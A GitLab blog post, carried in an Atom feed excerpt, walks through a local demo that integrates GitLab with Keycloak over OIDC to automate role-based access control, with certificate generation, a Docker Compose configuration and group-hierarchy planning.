            <uri>https://about.gitlab.com/blog/authors/andy-bradfield</uri>
        </author>
        <published>2025-06-23T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Automating role-based access control (RBAC) at scale]]></title>
        <id>https://about.gitlab.com/blog/automating-role-based-access-control-rbac-at-scale/</id>
        <link href="https://about.gitlab.com/blog/automating-role-based-access-control-rbac-at-scale/"/>
        <updated>2025-06-20T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Security starts with structure. Building a scalable and secure development platform begins with getting the fundamentals right — especially role-based access control (RBAC).</p>
<p>To help our customers scale effectively, we developed the RBAC Accelerator — a modular, outcome-driven enablement program that supports large organizations in defining, enforcing, and scaling access policies across GitLab.</p>
<p>This foundation enables broader transformation. For example, the Secure SDLC Accelerator, built on top of the RBAC Accelerator, empowers customers to integrate compliance, security, and DevSecOps best practices into their workflows.</p>
<p>GitLab customer <a href="https://www.lelyna.com/us/">Lely</a>, a major Dutch manufacturer of agricultural machines and robots, used this approach to migrate to GitLab Dedicated. Lely automated user provisioning via Azure AD using OpenID Connect (OIDC), enforced <a href="https://about.gitlab.com/blog/the-ultimate-guide-to-least-privilege-access-with-gitlab/">least-privilege policies</a>, and created a scalable, reusable access model to support their future development initiatives.</p>
<p>In this guide, we’ll take you through a hands-on implementation example of GitLab + <a href="https://www.keycloak.org/">Keycloak</a> + OIDC, covering everything from running the setup in a Docker environment to automating role mapping, designing a scalable group hierarchy, and aligning GitLab access controls with organizational structure and compliance goals.</p>
<p>This is a local demo setup intended for proof-of-concept purposes only.</p>
<p>Whether you’re just starting out or optimizing at scale, this modular foundation ensures you’re not just securing access — you’re enabling everything that comes next.</p>
<h2>Getting started with access control planning</h2>
<p>Before implementing any tooling, it’s essential to understand your access landscape.</p>
<p>Consider:</p>
<ul>
<li>What GitLab resources need protection (projects, groups, environments)?</li>
<li>Who are your personas (Developers, Maintainers, Guests, etc.)?</li>
<li>What organizational units (departments, cost centers) should govern access?</li>
<li>How does your IdP structure (Keycloak) define users and roles?</li>
</ul>
<p>Use this stage to draft your:</p>
<ul>
<li>Access control matrix</li>
<li>GitLab group hierarchy (team- or product-based)</li>
<li>Least privilege policy assumptions</li>
</ul>
<p>Sample group hierarchy</p>
<pre><code class="language-mermaid">graph TD
    Root[&quot;Root (Root Group)&quot;]
    FirmwareTeam[&quot;Firmware-Team&quot;]
    FirmwareDevelopers[&quot;Developers (GitLab Developer Role)&quot;]
    FirmwareMaintainers[&quot;Maintainers (GitLab Maintainer Role)&quot;]
    FirmwareReporters[&quot;Reporters (GitLab Reporter Role)&quot;]
    HardwareTeam[&quot;Hardware-Team&quot;]
    HardwareDevelopers[&quot;Developers&quot;]
    SoftwareTeam[&quot;Software-Team&quot;]
    SoftwareDevelopers[&quot;Developers&quot;]
    SoftwareMaintainers[&quot;Maintainers&quot;]
    SoftwareReporters[&quot;Reporters&quot;]
    
    Enterprise --&gt; FirmwareTeam
    Enterprise --&gt; HardwareTeam
    Enterprise --&gt; SoftwareTeam
    
    FirmwareTeam --&gt; FirmwareDevelopers
    FirmwareTeam --&gt; FirmwareMaintainers
    FirmwareTeam --&gt; FirmwareReporters
    
    HardwareTeam --&gt; HardwareDevelopers
    
    SoftwareTeam --&gt; SoftwareDevelopers
    SoftwareTeam --&gt; SoftwareMaintainers
    SoftwareTeam --&gt; SoftwareReporters
</code></pre>
<h2>Demo system setup: GitLab + Keycloak in a local Docker environment</h2>
<h3>Prerequisites</h3>
<ul>
<li>Docker, Docker Compose, OpenSSL</li>
<li>GitLab Version 17.7.3 and Keycloak Version 23.0.7 container images</li>
<li>Self-signed certificates</li>
</ul>
<h3>.env configuration</h3>
<p>The demo setup is using the following GitLab and Keycloak versions, ports and secrets.</p>
<h4>GitLab configuration</h4>
<pre><code class="language-bash">GITLAB_VERSION=17.7.3-ee.0
GITLAB_EXTERNAL_URL=http://localhost:8081
GITLAB_SSH_PORT=8222
</code></pre>
<h4>Keycloak configuration</h4>
<pre><code class="language-bash">KEYCLOAK_VERSION=latest
KEYCLOAK_ADMIN=&lt;your-admin-username&gt;
KEYCLOAK_ADMIN_PASSWORD=&lt;your-admin-password&gt;
KEYCLOAK_HTTPS_PORT=8443
KEYCLOAK_CLIENT_SECRET=&lt;your-client-secret&gt;  # Get this from Keycloak after setup
</code></pre>
<h2>Generate SSL certificates</h2>
<p>To establish trust between GitLab and Keycloak, especially in a self-hosted Docker environment, we’ll need to generate self-signed SSL certificates. These certificates will enable encrypted HTTPS communication and ensure GitLab can securely talk to Keycloak during the OIDC authentication process.</p>
<p>For production environments, we recommend using certificates from a trusted Certificate Authority (CA), but for local testing and development, self-signed certificates are sufficient.</p>
<p>Follow these step-by-step instructions:</p>
<ol>
<li>Create a folder for the certificates.</li>
</ol>
<p><code> mkdir -p certs</code></p>
<ol start="2">
<li>Generate a self-signed certificate with OpenSSL.</li>
</ol>
<pre><code class="language-bash">openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout certs/tls.key \
  -out certs/tls.crt \
  -subj &quot;/CN=keycloak&quot; \
  -addext &quot;subjectAltName=DNS:keycloak,DNS:localhost&quot;
</code></pre>
<ol start="3">
<li>Create a PKCS12 keystore for Keycloak.</li>
</ol>
<pre><code class="language-bash">openssl pkcs12 -export \
  -in certs/tls.crt \
  -inkey certs/tls.key \
  -out certs/keystore.p12 \
  -name keycloak \
  -password pass:password
</code></pre>
<h2>Start the service using Docker compose</h2>
<p>Now that we have our certificates, we can stand up our local GitLab + Keycloak environment using Docker Compose:</p>
<pre><code class="language-yaml">version: '3.8'
services:
  gitlab:
    image: gitlab/gitlab-ee:${GITLAB_VERSION}
    container_name: gitlab
    restart: unless-stopped
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url '${GITLAB_EXTERNAL_URL:-http://localhost:8081}'
        gitlab_rails['gitlab_shell_ssh_port'] = ${GITLAB_SSH_PORT:-8222}
        gitlab_rails['display_initial_root_password'] = true

        # OAuth Configuration
        gitlab_rails['omniauth_enabled'] = true
        gitlab_rails['omniauth_allow_single_sign_on'] = ['openid_connect']
        gitlab_rails['omniauth_block_auto_created_users'] = false
        gitlab_rails['omniauth_providers'] = [
            {
                'name' =&gt; 'openid_connect',
                'label' =&gt; 'Keycloak',
                'args' =&gt; {
                    'name' =&gt; 'openid_connect',
                    'scope' =&gt; ['openid', 'profile', 'email'],
                    'response_type' =&gt; 'code',
                    'issuer' =&gt; 'https://localhost:8443/realms/GitLab',
                    'client_auth_method' =&gt; 'query',
                    'discovery' =&gt; false,
                    'uid_field' =&gt; 'preferred_username',
                    'pkce' =&gt; true,
                    'client_options' =&gt; {
                        'identifier' =&gt; 'gitlab',
                        'secret' =&gt; '${KEYCLOAK_CLIENT_SECRET}',
                        'redirect_uri' =&gt; '${GITLAB_EXTERNAL_URL:-http://localhost:8081}/users/auth/openid_connect/callback',
                        'authorization_endpoint' =&gt; 'https://localhost:8443/realms/GitLab/protocol/openid-connect/auth',
                        'token_endpoint' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/token',
                        'userinfo_endpoint' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/userinfo',
                        'jwks_uri' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/certs'
                    }
                }
            }
        ]
    volumes:
      - gl-config:/etc/gitlab
      - gl-data:/var/opt/gitlab
      - ./certs/tls.crt:/etc/gitlab/trusted-certs/keycloak.crt
    ports:
      - '${GITLAB_EXTERNAL_PORT:-8081}:8081'
      - '${GITLAB_SSH_PORT:-8222}:22'
    shm_size: '256m'

  keycloak:
    image: quay.io/keycloak/keycloak:${KEYCLOAK_VERSION}
    container_name: keycloak-server
    restart: unless-stopped
    command: [
      &quot;start-dev&quot;,
      &quot;--import-realm&quot;,
      &quot;--https-port=${KEYCLOAK_HTTPS_PORT}&quot;,
      &quot;--https-key-store-file=/etc/x509/https/keystore.p12&quot;,
      &quot;--https-key-store-password=password&quot;
    ]
    volumes:
      - ./data:/opt/keycloak/data/import
      - ./certs:/etc/x509/https
    environment:
      KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN}
      KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD}
    ports:
      - &quot;${KEYCLOAK_HTTPS_PORT}:8443&quot;

volumes:
  gl-config:
  gl-data:
</code></pre>
<p>Run the <code>docker-compose up -d</code> command and your GitLab + Keycloak environment will be up in minutes.</p>
<pre><code>docker-compose up -d
</code></pre>
<h2>Keycloak realm configuration</h2>
<p>Your Keycloak realm is automatically configured on startup as it's defined in the <code>docker-compose</code> file.</p>
<p>The realm configuration will include:</p>
<ul>
<li>Pre-configured GitLab client</li>
<li>Default client secret</li>
</ul>
<p>You can access Keycloak admin console at <code>https://localhost:8443</code> with:</p>
<ul>
<li>Username: admin</li>
<li>Password: from your <code>.env</code> file</li>
<li>To verify the setup:
<ul>
<li>Log into Keycloak admin console</li>
<li>Select the <strong>GitLab</strong> realm</li>
<li>Check <strong>Clients &gt; gitlab</strong></li>
</ul>
</li>
</ul>
<p>Verify the client configuration matches your environment.</p>
<p>To showcase the automated RBAC mechanism, you will need to follow these steps:</p>
<ul>
<li>Map realm roles to GitLab roles</li>
<li>Create group structure with mapping roles, matching the Group, Sub-group, Project pattern in GitLab.</li>
</ul>
<p>Before provisioning your first users to the user groups, it’s recommended to log into your GitLab instance to retrieve your instance root password:</p>
<ol>
<li>
<p>Access GitLab at <code>http://localhost:8081</code>.</p>
</li>
<li>
<p>Get the root password:</p>
</li>
</ol>
<pre><code>docker exec gitlab grep 'Password:' `/etc/gitlab/initial_root_password`

</code></pre>
<ol start="3">
<li>Log in as root with the retrieved password.</li>
</ol>
<h2>Putting it all together</h2>
<p>To demonstrate the power of this integrated RBAC model, start by walking through a real-world user journey — from identity to access.</p>
<p>Begin in Keycloak by showcasing a user assigned to specific realm roles (e.g., developer, maintainer) and groups (e.g., /engineering/platform). These roles have been mapped to GitLab access levels via OIDC claims, while group affiliations align with GitLab’s structured hierarchy of root groups, sub-groups, and projects.</p>
<p>Upon login through GitLab’s SSO Keycloak endpoint, the user is automatically provisioned into the correct group and assigned the appropriate role — with no manual intervention.</p>
<p>Within GitLab, you can see that the  user can interact with the assigned project: For example, a developer might push code and open a merge request, but not merge to protected branches — validating the least-privilege model.</p>
<p>Finally, you can showcase access across multiple teams or products that are managed centrally in Keycloak, yet enforced precisely in GitLab through group sync and permissions inheritance. This demo illustrates not just role assignment, but how GitLab and Keycloak together deliver real-time, automated access governance at scale — ready for secure, compliant, enterprise-grade software development.</p>
<h2>Why GitLab?</h2>
<p>GitLab’s comprehensive, intelligent DevSecOps platform is the ideal foundation for secure, scalable access management. With native OIDC support, granular role enforcement, SCIM-based user provisioning, and built-in audit logging, GitLab allows organizations to centralize control without compromising agility. Its flexible group hierarchy mirrors enterprise structure, making it easy to manage access across teams.</p>
<p>Integrating with identity providers like Keycloak automates onboarding, ensures least-privilege access, and creates a seamless identity-to-permission pipeline that supports regulatory and security goals. As a core component of GitLab’s security capabilities, RBAC ties directly into CI/CD, policy enforcement, and vulnerability management workflows.</p>
<h2>Summary</h2>
<p>RBAC is just the beginning. With GitLab and Keycloak, you’re not just securing access — you’re enabling structured, automated governance that scales. As you expand into policy enforcement, Secure SDLC, and DevSecOps automation, this foundation becomes a launchpad for sustainable, enterprise-grade software delivery.</p>
<blockquote>
<p>Get started with RBAC in GitLab today with a free, 60-day trial of GitLab Ultimate. <a href="https://about.gitlab.com/free-trial/">Sign up today</a>!</p>
</blockquote>
]]></content>
        <author>
            <name>James Wormwell</name>
            <uri>https://about.gitlab.com/blog/authors/james-wormwell</uri>
        </author>
        <author>
            <name>Paul Meresanu</name>
            <uri>https://about.gitlab.com/blog/authors/paul-meresanu</uri>
        </author>
        <author>
            <name>Kees Valkhof</name>
            <uri>https://about.gitlab.com/blog/authors/kees-valkhof</uri>
        </author>
        <published>2025-06-20T00:00:00.000Z</published>
    </entry>
</feed>